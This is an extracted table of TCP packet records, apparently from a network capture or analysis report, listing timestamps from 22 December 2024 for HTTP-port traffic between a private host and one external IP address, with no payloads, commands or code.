                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.141704082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.141829014 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.141907930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.142576933 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.142707109 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.142784119 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.143460989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.143644094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.143721104 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.144335985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.144464970 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.144542933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.145205975 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.145384073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.145462036 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.146073103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.146181107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.146258116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.146944046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.147063017 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.147140980 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.147840023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.147970915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.148046017 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.148705006 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.148821115 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.148899078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.149558067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.149686098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.149764061 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.150471926 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.150574923 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.150654078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.151350975 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.151449919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.151525021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.152170897 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.152349949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.152427912 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.153072119 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.153202057 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.153278112 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.153944016 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.154064894 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.154145002 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.154786110 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.154946089 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.155021906 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.155678034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.155798912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.155877113 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.156552076 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.156670094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.156745911 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.157429934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.157546043 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.157623053 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.158283949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.158395052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.158469915 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.159198999 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.159449100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.159528971 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.160053968 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.160270929 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.160351038 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.160921097 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.161034107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.161111116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.161803007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.161938906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.162017107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.162667036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.162796021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.162870884 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.163552046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.163672924 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.163752079 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.164407969 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.164534092 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.164617062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.165281057 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.165394068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.165472031 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.166142941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.166277885 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.166359901 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.166968107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.168313026 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311213017 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311259031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311295986 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311364889 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311506987 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311532021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311687946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311734915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.311810970 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.312483072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.312602997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.312686920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.313338041 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.313443899 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.313524008 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.314169884 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.314305067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.314385891 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.315007925 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.315150023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.315244913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.315850019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.315982103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.316057920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.316714048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.316811085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.316890001 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.317563057 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.317692995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.317764044 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.318413019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.318542004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.318619967 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.319262028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.319459915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.319539070 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.320111036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.320249081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.320328951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.320996046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.321222067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.321300030 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.321811914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.321955919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.322035074 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.322645903 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.322772980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.322849035 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.323502064 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.323627949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.323704958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.324359894 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.324476957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.324556112 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.325189114 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.325335026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.325412035 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.326040030 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.326181889 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.326308966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.326883078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.327023029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.327105999 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.327725887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.327867985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.327939987 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.328571081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.328715086 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.328792095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.329423904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.329550028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.329624891 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.330286026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.330419064 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.330499887 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.331180096 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.331280947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.331377029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.331988096 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.332107067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.332185984 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.332859039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.332978964 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.333056927 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.333694935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.333926916 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.334003925 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.334563971 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.334713936 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.334793091 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.335422039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.335563898 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.335639954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.336220026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.336322069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.336399078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.337085962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.337265015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.337342978 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.337944031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.338068962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.338148117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.338789940 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.338910103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.338985920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.339627981 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.339761972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.339833975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.340461016 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.340604067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.340676069 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.341356039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.341455936 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.341548920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.342147112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.342298031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.342386961 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.343023062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.343127966 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.343211889 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.343907118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.344054937 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.344080925 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.344187975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.344710112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.344841003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.344924927 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.345556974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.345669031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.345746994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.346421003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.346519947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.346606016 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.347264051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.347398043 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.347476006 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.348107100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.348229885 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.348309994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.348973989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.349241018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.349311113 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.349821091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.350321054 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.350399971 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.350667953 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.350763083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.350820065 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.351558924 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.351660967 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.351710081 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.352355003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.352473974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.352524996 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.353193045 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.353322029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.353369951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.354078054 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.354126930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.354195118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.354897022 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.354943991 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.503248930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.503348112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.503386021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.503423929 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.503509998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.503509998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.504029036 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.504147053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.504201889 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.504216909 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.504260063 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.504949093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.505049944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.505121946 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.505785942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.505899906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.505902052 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.506619930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.506671906 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.506736040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.507467031 CET804980431.41.244.11192.168.2.4
